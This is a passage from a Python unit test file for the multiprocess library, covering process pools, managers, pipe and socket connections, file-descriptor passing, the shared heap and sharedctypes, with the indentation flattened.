it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with warnings_helper.check_warnings(
('unclosed running multiprocessing pool', ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def _test_unpickleable_result(self):
from multiprocess.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocess.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(os_helper.unlink, os_helper.TESTFN)
with open(os_helper.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocess import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct access flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# access=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocess.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
